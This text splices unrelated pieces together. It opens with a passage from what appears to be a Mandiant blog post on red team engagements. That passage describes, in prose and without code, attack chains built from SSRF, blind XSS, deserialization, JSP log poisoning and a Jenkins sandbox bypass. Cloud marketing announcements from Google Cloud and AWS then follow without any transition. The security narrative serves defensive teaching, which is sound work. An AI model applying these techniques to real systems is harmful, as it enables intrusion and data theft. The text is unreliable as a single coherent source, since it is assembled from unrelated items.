A company in the energy sector engaged Mandiant to assess the efficiency of its cybersecurity team’s abilities in detection, prevention, and response. Because the organization had grown significantly in the past years following multiple acquisitions, Mandiant suggested an increased focus on their external perimeter. This would allow the organization to measure the subsidiaries’ external security posture, compared to the parent organization’s.
Target of Interest
Following a thorough reconnaissance phase, the AppSec Team began examination of a mobile application developed by the customer for its business partners. Once the mobile application was decompiled, a hardcoded API key granting unauthorized access to an external API service was discovered. Leveraging the API key, authenticated reconnaissance on the API service was conducted, which led to the discovery of a significant vulnerability within the application’s PDF generation feature: a full-read Server-Side Request Forgery (SSRF), enabled through HTML injection.
Vulnerability Identification
During the initial reconnaissance phase, the team observed that numerous internal systems’ hostnames were publicly accessible through certificate transparency logs. With that in mind, the objective was to exploit the SSRF vulnerability to determine if any of these internal systems were reachable via the external API service. Eventually, one such host was identified: a commercial ASP.NET document management solution. Once the solution’s name and version were identified, the AppSec Team searched for known vulnerabilities online. Among the findings was a recent CVE entry regarding insecure ViewState deserialization, which included details about the affected dynamic-link library (DLL) name.
Exploitation
With no public exploit proof-of-concepts available, the team searched for the DLL without success until the file was found in VirusTotal’s public corpus. The DLL was then decompiled into C# code, revealing the vulnerable function, which provided all the necessary components for a successful exploitation. Next, the application security consultants leveraged the post-authentication SSRF vector to exploit the ViewState deserialization vulnerability, affecting the internal application. This attack chain led to a reliable foothold into the parent organization’s internal network.
Figure 2: HTML to PDF Server-Side Request Forgery to deserialization
Takeaways
The organization’s demilitarized zone (DMZ) was now breached, and the remote access could be passed off to the Red Team operators. This enabled the operators to perform lateral movement into the network and achieve various predetermined objectives. However, the customer expressed high satisfaction with the demonstrated impact prior to lateral movement, especially since the application server housed numerous sensitive documents. This underscores a common misconception that exploiting the external perimeter must necessarily result in facilitating lateral movement within the internal network. Yet, the impact was evident even before lateral movement, simply by gaining access to the customer’s sensitive data.
Breaking Barriers: Blind XSS as a Gateway to Internal Networks
Context
A company operating in the technology industry engaged Mandiant for a Red Team assessment. This company, with a very mature security program, requested that no phishing be performed because they were already conducting numerous internal phishing and vishing exercises. They highlighted that all previous Red Team engagements had relied heavily on various social engineering methods, and the success rate was consistently low.
Target of Interest
During the external reconnaissance efforts, the AppSec Team identified multiple targets of interest, such as a custom-built customer relationship management (CRM) solution. Leveraging the Wayback Machine on the CRM hostname, a legacy endpoint was discovered, which appeared obsolete but still accessible without authentication.
Vulnerability Identification
Despite not being accessible through the CRM’s user interface, the endpoint contained a functional form to request support. The AppSec Team injected a blind cross-site scripting (XSS) payload into the form, which loaded an external JavaScript file containing post-exploitation code. When successful, this method allows an adversary to temporarily hijack the targeted user’s browser tab, allowing attackers to perform actions on behalf of the user. Moments later, the team received a notification that the payload successfully executed within the context of a user browsing an internal customer support administration panel.
The AppSec Team analyzed the exfiltrated Document Object Model (DOM) to further understand the payload’s execution context and assess the data accessible within this internal application.The analysis revealed references to Apache Tapestry framework version 3, a framework initially released in 2004. Shortly after identifying the internal application’s framework, Mandiant deployed a local Tapestry v3 instance to identify potential security pitfalls. Through code review, Mandiant discovered a zero-day deserialization vulnerability in the core framework, which led to remote code execution (RCE). Apache Software Foundation assigned CVE-2022-46366 for this RCE.
Exploitation
The zero-day, which affected the internal customer support application, was exploited by submitting an additional blind XSS payload. Crafted to trigger upon form submission, the payload autonomously executed in an employee’s browser, exploiting the internal application’s deserialization flaw. This led to a crucial foothold within the client’s infrastructure, enabling the Red Team to progress with their lateral movement until all objectives were successfully accomplished.
Figure 3: Remote code execution staged with blind cross-site scripting
Takeaways
This real-world scenario highlights a common misconception that cross-site scripting holds minimal relevance in Red Team assessments. The significance and impact of this particular attack vector in this case study were evident: it acted as a gateway, breaching the external network and leveraging an employee’s internal network position as a proxy to exploit the internal application. Mandiant had not previously identified XSS vulnerabilities on the external perimeter, which further highlights how the security posture of the external perimeter can be much more robust than that of the internal network.
Logger Danger: From Log Files to Unauthorized Cloud Access
Context
An organization in the transportation sector engaged Mandiant to perform a Red Team assessment, with the goal of emulating an initial access broker (IAB) threat group, focused on breaching externally exposed systems and services. Those groups, who typically resell illegitimate access to compromised victims’ environments, were previously identified as a significant threat to the organization by the Google Threat Intelligence (GTI) team while building a threat profile to help support assessment activities.
Target of Interest
Among hundreds of external applications identified during the reconnaissance phase, one stood out: a commercial Java-based supply chain management solution hosted in the cloud. This application brought additional attention upon discovery of an online forum post describing its installation procedures. Within the post, a link to an unlisted YouTube video was shared, offering detailed installation and administration guidance. Upon reviewing the video, the AppSec Team noted the URL for the application’s trial installer, still accessible online despite not being referenced or indexed anywhere else.
Following installation and local deployment, an administration manual was available within the installation folder. This manual contained a section for a web-based performance monitor plugin that was deployed by default with the application, along with its default credentials. The plugin’s functionality included logging performance metrics and stack traces locally in files upon encountering unhandled errors. Furthermore, the plugin’s endpoint name was uniquely distinct, making it highly unlikely to be discovered with conventional directory brute-forcing methods.
Vulnerability Identification
The AppSec Team successfully logged into the organization’s performance monitor plugin by using the default credentials sourced from the administration manual and resumed local testing to identify post-authentication vulnerabilities. Conducting code review in parallel with manual testing, a log management feature was identified, which allowed authenticated users to manipulate log filenames and directories. The team also observed they could induce errors through targeted, malformed HTTP requests. In conjunction with the log filename manipulation, it was possible to force arbitrary data to be stored at an arbitrary file location on the underlying server’s file system.
Exploitation
The strategy involved intentionally triggering exceptions, which the performance monitor would then log in an attacker-defined Jakarta Server Pages (JSP) file within the web application’s root directory. The AppSec Team crafted an exploit that injected arbitrary JSP code into an HTTP request’s parameter, forcing the performance monitor to log errors into the attacker-controlled JSP file. Upon accessing the JSP log file, the injected code executed, enabling Mandiant to breach the customer’s cloud environment and access thousands of sensitive logistics documents.
Figure 4: Remote code execution through log file poisoning
Takeaways
A common assumption that breaches should lead to internal on-premises network access or to Active Directory compromise was challenged in this case study. While lateral movement was constrained by time, the primary objective was achieved: emulating an initial access broker. This involved breaching the cloud environment, where the client lacked visibility compared to its internal Active Directory network, and gaining access to business-critical crown jewels.
Collaborative Intrusion: Webhooks to CI/CD Pipeline Access
Context
A company in the automotive sector engaged Mandiant to perform a Red Team assessment, with the goal of obtaining access to their continuous integration and continuous delivery/deployment (CI/CD) pipeline. Due to the sheer number of externally exposed systems, the AppSec Team was staffed to support the Red Team’s reconnaissance and breaching efforts.
Target of Interest
Most of the interesting applications were redirecting to the customer’s single-sign on (SSO) provider. However, one application had a different behavior. By querying the Wayback Machine, the team uncovered an endpoint that did not redirect to the SSO. Instead, it presented a blank page with a unique favicon. With the goal of identifying the application’s underlying technology, the favicon’s hash was calculated and queried using Shodan. The results returned many other live applications sharing the same favicon. Interestingly, some of these applications operated independently of SSO, aiding the team in identifying the application’s name and vendor.
Vulnerability Identification
Once the application’s name was identified, the team visited the vendor’s website and accessed their public API documentation. Among the API endpoints, one stood out—it could be directly accessed on the customer’s application without redirection to the SSO. This API endpoint did not require authentication and only took an incremental numerical ID as its parameter’s value. Upon querying, the response contained sensitive employee information, including email addresses and phone numbers. The team systematically iterated through the API endpoint, incrementing the ID parameter to compile a comprehensive list of employee email addresses and phone numbers. However, the Red Team refrained from leveraging this data, as another intriguing application was discovered. This application exposed a feature that could be manipulated into sending fully user-controlled emails from the company’s no-reply@ email address.
Capitalizing on these vulnerabilities, the Red Team initiated a phishing campaign, successfully gaining a foothold in the customer’s network before the AppSec Team could identify an external breach vector. As efforts continued on the internal post-exploitation, the application security consultants shifted their focus to support the Red Team’s efforts within the internal network.
Exploitation
Digging into network shares, the Red Team found credentials of a developer for an enterprise source control application account. The AppSec Team sifted through reconnaissance data and flagged that the same source control application server was exposed externally. The credentials were successfully used to log in, as multi factor authentication was absent for this user. Within the GitHub interface, the team uncovered a pre-defined webhook linked to the company’s internal Jenkins—an integration commonly employed for facilitating communication between source control systems and CI/CD pipelines. Leveraging this discovery, the team created a new webhook. When manually triggered by the team, this webhook would perform an SSRF to internal URLs. This eventually led to the exploitation of an unauthenticated Jenkins sandbox bypass vulnerability (CVE-2019-1003030), and ultimately in remote code execution, effectively compromising the organization’s CI/CD pipeline.
Figure 5: External perimeter breach via CI/CD SSRF
Takeaways
In this case study, the efficacy of collaboration between the Red Team and the AppSec Team was demonstrated. Leveraging insights gathered collectively, the teams devised a strategic plan to achieve the main objective set by the customer: accessing its CI/CD pipelines. Moreover, we challenged the misconception that singular critical vulnerabilities are indispensable for reaching objectives. Instead, we revealed the reality where achieving goals often requires innovative detours. In fact, a combination of vulnerabilities or misconfigurations, whether they are discovered by the AppSec Team or the Red Team, can be strategically chained together to accomplish the mission.
Conclusion
As this blog post demonstrated, the integration of application security expertise into Red Team assessments yields significant benefits for organizations seeking to understand and strengthen their security posture. By proactively identifying and addressing vulnerabilities across the entire attack surface, including those commonly overlooked by traditional approaches, businesses can minimize the risk of breaches, protect critical assets, and hopefully avoid the financial and reputational damage associated with successful attacks.
This integrated approach is not limited to Red Team engagements. Organizations with varying maturity levels can also leverage application security expertise within the context of focused external perimeter assessments. These assessments provide a valuable and cost-effective way to gain insights into the security of internet-facing applications and systems, without the need for a Red Team exercise.
Whether through a comprehensive Red Team engagement or a targeted external assessment, incorporating application security expertise enables organizations to better simulate the tactics and techniques of modern adversaries.
Google Cloud is delighted to announce the opening of our 41st cloud region in Querétaro, Mexico. This marks our third cloud region in Latin America, joining Santiago, Chile, and São Paulo, Brazil. From Querétaro, we’ll provide fast, reliable cloud services to businesses and public sector organizations throughout Mexico and beyond. This new region offers low latency, high performance, and local data residency, empowering organizations to innovate and accelerate digital transformation initiatives.
Helping organizations in Mexico thrive in the cloud
Google Cloud regions are major investments to bring best-in-class infrastructure, cloud and AI technologies closer to customers. Enterprises, startups, and public sector organizations can leverage Google Cloud’s infrastructure economy of scale and global network to deliver applications and digital services to their end users.
With this new region in Querétaro, Mexico, Google Cloud customers enjoy:
Speed: Serve your end users with fast, low-latency experiences, and transfer large amounts of data between networks easily across Google’s global network.
Security: Keep your organizations’ and customers’ data secure and compliant, including meeting the requirements of CNBV contractual frameworks, and maintain local data residency.
Capacity: Scale to meet growing user and business needs.
Sustainability: Reduce the carbon footprint of your IT environment and help meet sustainability targets.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3edc867b96d0>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Google Cloud customers are eager to benefit from the new possibilities that this cloud region offers:
“At Prosa, we have been undergoing a transformation process for the past three years that involves adopting technology and developing digital skills within our teams. The partnership with Google has been key to carrying out projects, evolving towards digital business models, enabling the ecosystem, promoting the API-ification of services, and improving data analysis. This alliance is only deepened with the launch of the new Google Cloud region, which will facilitate the integration of participants into the payment ecosystem in a secure and highly available manner, improving the customer experience and delivering value more quickly and agilely,” said Salvador Espinosa, CEO of Prosa, a payment technology company that processed more than 10 million transactions in 2023.
Building a new Google Cloud region in Querétaro, Mexico is welcomed by the Mexican public sector.
“The new Google cloud region in Mexico will be key to build a digital government accountable to citizens, deepening our path to digital transformation. Since 2018, the Auditoria Superior de la Federación (ASF) has pioneered digital transformation in Mexico, promoting innovation and the responsible use of technology, while using advanced technologies like Google Cloud’s Vertex AI, among other proprietary tools, to enhance data analysis, automate processes, and improve collaboration. This enables more accurate decision-making, optimized oversight of public spending, increased inspection coverage, and transparent use of resources. Thanks to the cloud, we see a future where technology is a strategic ally to execute efficient, agile and exhaustive digital audits, detect irregularities early, and strengthen accountability. ASF’s focus on transparency and efficiency aligns with President Claudia Sheinbaum’s public innovation policy.” – Emilio Barriga Delgado, Special Auditor of Federalized Expenditure, Auditoria Superior de la Federación
The new cloud region also opens new opportunities for our global ecosystem of over 100,000 incredibly diverse partners.
“For Amarello and our customers, the availability of a new region in Mexico demonstrates the great growth of Google Cloud and its commitment to Mexico. It’s also a great milestone for the country, putting us on par with other economies. This will create jobs that will speed up our clients’ adoption of strategic projects and latency-sensitive technological services such as financial services or mission-critical operations. At the same time, the new region will enable projects that require information to be maintained within the national territory, now on the most innovative and secure public cloud.” – Mauricio Sánchez Valderrama, managing partner, Amarello Tecnologías de Información
And for global companies looking to tap into the Mexican market:
As networks shift to a cloud-first approach, and hybrid work enables work from anywhere, businesses in the Mexico region can now securely accelerate innovation, boost efficiency, and enhance customer experiences with Palo Alto Networks AI-powered solutions, like Prisma SASE, built in the cloud to secure the cloud at scale. The powerful collaboration between Google Cloud and Palo Alto Networks reinforces our commitment to security and innovation so organizations can confidently embrace the AI-driven future, knowing their users, data, and applications are protected from evolving threats.” Anupam Upadhyaya, Vice President, Product Management, Palo Alto Networks
Delivering on our commitment to Latin America
In 2022, we announced a five-year, $1.2 billion commitment to Latin America, focusing on four key areas: digital infrastructure, digital skills, entrepreneurship, and inclusive, sustainable communities.
We’re equally committed to creating new career opportunities for people in Mexico and Latin America: We’re working with over 550 universities across Latin America to offer a robust and continuously updated portfolio of learning resources so students can seize the opportunities created by new digital technologies like AI and the cloud. As a result, we’ve already granted more than 14,000 digital skill badges to students and individual developers in Mexico over the last 24 months.
Another example of our commitment is the “Súbete a la nube” program that we created in partnership with the Inter-American Development Bank (IDB), with a focus on women and the southern region of the country. To date, 12,500 people have registered for essential digital skills training in cloud computing through the program.
Today, we’re also announcing a commitment to train 1 million Mexicans in AI and cloud technologies over the coming years. Google Cloud will continue to skill Mexico’s local talent with a variety of no-cost training programs for students, developers and customers. Some of the ongoing training programs will include no-cost, localized courses available through YouTube, credentials through the Google Cloud Skills Boost platform, community support by Google Developer Groups, and scholarships for the Google Career Certificates that help prepare learners for high-growth, in-demand jobs in fields like cybersecurity and data analytics, so the cloud can truly democratize innovation and technology.
This new Google Cloud region is also a step towards providing generative AI products and services to Latin American customers. Cloud computing will increasingly be a key gateway towards the development and usage of AI, helping organizations compete and innovate at global scale.
Google Cloud is dedicated to being the partner of choice for customers undergoing digital transformation. We’re focused on providing sustainable, low-carbon options for running applications and infrastructure. Since 2017, we’ve matched 100% of our global annual electricity use with renewable energy. We’re aiming even higher with our 2030 goal: operating on 24/7 carbon-free energy across every electricity grid where we operate, including Mexico.
We’re incredibly excited to open the Querétaro, Mexico region, bringing low-latency, reliable cloud services to Mexico and Latin America, so organizations can take advantage of all that the cloud has to offer. Stay tuned for even more Google Cloud regions coming in 2025 (and beyond), and click here to learn more about Google Cloud’s global infrastructure.
Today Amazon Web Services, Inc. (AWS) announced the general availability of Amazon SageMaker partner AI apps, a new capability that enables customers to easily discover, deploy, and use best-in-class machine learning (ML) and generative AI (GenAI) development applications from leading app providers privately and securely, all without leaving Amazon SageMaker AI so they can develop performant AI models faster.
Until today, integrating purpose-built GenAI and ML development applications that provide specialized capabilities for a variety of model development tasks, required a considerable amount of effort. Beyond the need to invest time and effort in due diligence to evaluate existing offerings, customers had to perform undifferentiated heavy lifting in deploying, managing, upgrading and scaling these applications. Furthermore, to adhere to rigorous security and compliance protocols, organizations need their data to stay within the confines of their security boundaries without needing to move their data elsewhere, for example, to a Software as a Service (SaaS) application. Finally, the resulting developer experience is often fragmented, with developers having to switch back and forth between multiple disjointed interfaces. With SageMaker partner AI apps you can quickly subscribe to a partner solution and seamlessly integrate the app with your SageMaker development environment. SageMaker partner AI apps are fully managed and run privately and securely in your SageMaker environment reducing the risk of data and model exfiltration.
At launch, you will be able to boost your team’s productivity and reduce time to market by enabling: Comet, to track, visualize, and manage experiments for AI model development; Deepchecks, to evaluate quality and compliance for AI models; Fiddler, to validate, monitor, analyze, and improve AI models in production; and, Lakera, to protect AI applications from security threats such as prompt attacks, data loss and inappropriate content.
SageMaker partner AI apps is available in all currently supported regions except Gov Cloud. To learn more please visit SageMaker partner AI app’s developer guide.
Amazon SageMaker HyperPod now provides you with centralized governance across all generative AI development tasks, such as training and inference. You have full visibility and control over compute resource allocation, ensuring the most critical tasks are prioritized and maximizing compute resource utilization, reducing model development costs by up to 40%.
With HyperPod task governance, administrators can more easily define priorities for different tasks and set up limits for how many compute resources each team can use. At any given time, administrators can also monitor and audit the tasks that are running or waiting for compute resources through a visual dashboard. When data scientists create their tasks, HyperPod automatically runs them, adhering to the defined compute resource limits and priorities. For example, when training for a high-priority model needs to be completed as soon as possible but all compute resources are in use, HyperPod frees up resources from lower-priority tasks to support the training. HyperPod pauses the low-priority task, saves the checkpoint, and reallocates the freed-up compute resources. The preempted low-priority task will resume from the last saved checkpoint as resources become available again. And when a team is not fully using the resource limits the administrator has set up, HyperPod use those idle resources to accelerate another team’s tasks. Additionally, HyperPod is now integrated with Amazon SageMaker Studio, bringing task governance and other HyperPod capabilities into the Studio environment. Data scientists can now seamlessly interact with HyperPod clusters directly from Studio, allowing them to develop, submit, and monitor machine learning (ML) jobs on powerful accelerator-backed clusters.
Task governance for HyperPod is available in all AWS Regions where HyperPod is available: US East (N. Virginia), US West (N. California), US West (Oregon), Asia Pacific (Mumbai), Asia Pacific (Singapore), Asia Pacific (Sydney), and Asia Pacific (Tokyo), Europe (Frankfurt), Europe (Ireland), Europe (London), Europe (Stockholm), and South America (São Paulo).
Amazon SageMaker HyperPod announces flexible training plans, a new capability that allows you to train generative AI models within your timelines and budgets. Gain predictable model training timelines and run training workloads within your budget requirements, while continuing to benefit from features of SageMaker HyperPod such as resiliency, performance-optimized distributed training, and enhanced observability and monitoring.
In a few quick steps, you can specify your preferred compute instances, desired amount of compute resources, duration of your workload, and preferred start date for your generative AI model training. SageMaker then helps you create the most cost-efficient training plans, reducing time to train your model by weeks. Once you create and purchase your training plans, SageMaker automatically provisions the infrastructure and runs the training workloads on these compute resources without requiring any manual intervention. SageMaker also automatically takes care of pausing and resuming training between gaps in compute availability, as the plan switches from one capacity block to another. If you wish to remove all the heavy lifting of infrastructure management, you can also create and run training plans using SageMaker fully managed training jobs.
SageMaker HyperPod flexible training plans are available in the US East (N. Virginia), US East (Ohio), and US West (Oregon) AWS Regions. To learn more, visit: SageMaker HyperPod, documentation, and the announcement blog.
Amazon Bedrock Knowledge Bases now supports natural language querying to retrieve structured data from your data sources. With this launch, Bedrock Knowledge Bases offers an end-to-end managed workflow for customers to build custom generative AI applications that can access and incorporate contextual information from a variety of structured and unstructured data sources. Using advanced natural language processing, Bedrock Knowledge Bases can transform natural language queries into SQL queries, allowing users to retrieve data directly from the source without the need to move or preprocess the data.
Developers often face challenges integrating structured data into generative AI applications. This includes difficulties training large language models (LLMs) to convert natural language queries to SQL queries based on complex database schemas, as well as ensuring appropriate data governance and security controls are in place. Bedrock Knowledge Bases eliminates these hurdles by providing a managed natural language to SQL (NL2SQL) module. A retail analyst can now simply ask “What were my top 5 selling products last month?”, and then Bedrock Knowledge Base automatically translates that query into SQL, execute the query against the database, and return the results – or even provide a summarized narrative response. To generate accurate SQL queries, Bedrock Knowledge Base leverages database schema, previous query history, and other contextual information that are provided about the data sources.
Bedrock Knowledge Bases supports structured data retrieval from Amazon Redshift and Amazon Sagemaker Lakehouse at this time and is available in all commercial regions where Bedrock Knowledge Bases is supported. To learn more, visit here and here. For details on pricing, please refer here.
Amazon Bedrock Marketplace provides generative AI developers access to over 100 publicly available and proprietary foundation models (FMs), in addition to Amazon Bedrock’s industry-leading, serverless models. Customers deploy these models onto SageMaker endpoints where they can select their desired number of instances and instance types. Amazon Bedrock Marketplace models can be accessed through Bedrock’s unified APIs, and models which are compatible with Bedrock’s Converse APIs can be used with Amazon Bedrock’s tools such as Agents, Knowledge Bases, and Guardrails.
Amazon Bedrock Marketplace empowers generative AI developers to rapidly test and incorporate a diverse array of emerging, popular, and leading FMs of various types and sizes. Customers can choose from a variety of models tailored to their unique requirements, which can help accelerate the time-to-market, improve the accuracy, or reduce the cost of their generative AI workflows. For example, customers can incorporate models highly-specialized for finance or healthcare, or language translation models for Asian languages, all from a single place.
Amazon Bedrock Marketplace is supported in US East (N. Virginia), US East (Ohio), US West (Oregon), Asia Pacific (Mumbai), Asia Pacific (Seoul), Asia Pacific (Singapore), Asia Pacific (Sydney), Asia Pacific (Tokyo), Canada (Central), Europe (Frankfurt), Europe (Ireland), Europe (London), Europe (Paris), and South America (São Paulo).
For more information, please refer to Amazon Bedrock Marketplace’s announcement blog or documentation.
Today, AWS announces that Amazon Bedrock now supports prompt caching. Prompt caching is a new capability that can reduce costs by up to 90% and latency by up to 85% for supported models by caching frequently used prompts across multiple API calls. It allows you to cache repetitive inputs and avoid reprocessing context, such as long system prompts and common examples that help guide the model’s response. When cache is used, fewer computing resources are needed to generate output. As a result, not only can we process your request faster, but we can also pass along the cost savings from using fewer resources.
Amazon Bedrock is a fully managed service that offers a choice of high-performing FMs from leading AI companies via a single API. Amazon Bedrock also provides a broad set of capabilities customers need to build generative AI applications with security, privacy, and responsible AI capabilities built in. These capabilities help you build tailored applications for multiple use cases across different industries, helping organizations unlock sustained growth from generative AI while providing tools to build customer trust and data governance.
Prompt caching is now available on Claude 3.5 Haiku and Claude 3.5 Sonnet v2 in US West (Oregon) and US East (N. Virginia) via cross-region inference, and Nova Micro, Nova Lite, and Nova Pro models in US East (N. Virginia). At launch, only a select number of customers will have access to this feature. To learn more about participating in the preview, see this page. To learn more about prompt caching, see our documentation and blog.
Today, we are announcing the preview launch of Amazon Bedrock Data Automation (BDA), a new feature of Amazon Bedrock that enables developers to automate the generation of valuable insights from unstructured multimodal content such as documents, images, video, and audio to build GenAI-based applications. These insights include video summaries of key moments, detection of inappropriate image content, automated analysis of complex documents, and much more. Developers can also customize BDA’s output to generate specific insights in consistent formats required by their systems and applications.
By leveraging BDA, developers can reduce development time and effort, making it easier to build intelligent document processing, media analysis, and other multimodal data-centric automation solutions. BDA offers high accuracy at lower cost than alternative solutions, along with features such as visual grounding with confidence scores for explainability and built-in hallucination mitigation. This ensures accurate insights from unstructured, multi-modal data content. Developers can get started with BDA on the Bedrock console, where they can configure and customize output using their sample data. They can then integrate BDA’s unified multi-modal inference API into their applications to process their unstructured content at scale with high accuracy and consistency. BDA is also integrated with Bedrock Knowledge Bases, making it easier for developers to generate meaningful information from their unstructured multi-modal content to provide more relevant responses for retrieval augmented generation (RAG).
Bedrock Data Automation is available in preview in US West (Oregon) AWS Region.
To learn more, visit the Bedrock Data Automation page.
Organizations are increasingly using applications with multimodal data to drive business value, improve decision-making, and enhance customer experiences. Amazon Bedrock Guardrails now supports multimodal toxicity detection for image content, enabling organizations to apply content filters to images. This new capability with Guardrails, now in public preview, removes the heavy lifting required by customers to build their own safeguards for image data or spend cycles with manual evaluation that can be error-prone and tedious.
Bedrock Guardrails helps customers build and scale their generative AI applications responsibly for a wide range of use cases across industry verticals including healthcare, manufacturing, financial services, media and advertising, transportation, marketing, education, and much more. With this new capability, Amazon Bedrock Guardrails offers a comprehensive solution, enabling the detection and filtration of undesirable and potentially harmful image content while retaining safe and relevant visuals. Customers can now use content filters for both text and image data in a single solution with configurable thresholds to detect and filter undesirable content across categories such as hate, insults, sexual, and violence, and build generative AI applications based on their responsible AI policies.
This new capability in preview is available with all foundation models (FMs) on Amazon Bedrock that support images including fine-tuned FMs in 11 AWS regions globally: US East (N. Virginia), US East (Ohio), US West (Oregon), Europe (Ireland), Europe (Frankfurt), Europe (London), Asia Pacific (Seoul), Asia Pacific (Singapore), Asia Pacific (Tokyo), and Asia Pacific (Mumbai), and AWS GovCloud (US-West).
Starting today, you can build ML models using natural language with Amazon Q Developer, now available in Amazon SageMaker Canvas in preview. You can now get generative AI-powered assistance through the ML lifecycle, from data preparation to model deployment. With Amazon Q Developer, users of all skill levels can use natural language to access expert guidance to build high-quality ML models, accelerating innovation and time to market.
Amazon Q Developer will break down your objective into specific ML tasks, define the appropriate ML problem type, and apply data preparation techniques to your data. Amazon Q Developer then guides you through the process of building, evaluating, and deploying custom ML models. ML models produced in SageMaker Canvas with Amazon Q Developer are production ready, can be registered in SageMaker Studio, and the code can be shared with data scientists for integration into downstream MLOps workflows.
Amazon Q Developer is available in SageMaker Canvas in preview in the following AWS Regions: US East (N. Virginia), US West (Oregon), Europe (Frankfurt), Europe (Paris), Asia Pacific (Tokyo), and Asia Pacific (Seoul). To learn more about using Amazon Q Developer with SageMaker Canvas, visit the website, read the AWS News blog, or view the technical documentation.
Amazon announces a five-year commitment of cloud technology and technical support for organizations creating digital learning solutions that expand access for underserved learners worldwide through the AWS Education Equity Initiative. While the use of educational technologies continues to rise, many organizations lack access to cloud computing and AI resources needed to accelerate and scale their work to reach more learners in need.
Amazon is committing up to $100 million in AWS credits and technical advising to support socially-minded organizations build and scale learning solutions that utilize cloud and AI technologies. This will help reduce initial financial barriers and provide guidance on building and scaling AI-powered education solutions using AWS technologies.
Eligible recipients, including socially-minded edtechs, social enterprises, non-profits, governments, and corporate social responsibility teams, must demonstrate how their solution will benefit students from underserved communities. The initiative is now accepting applications.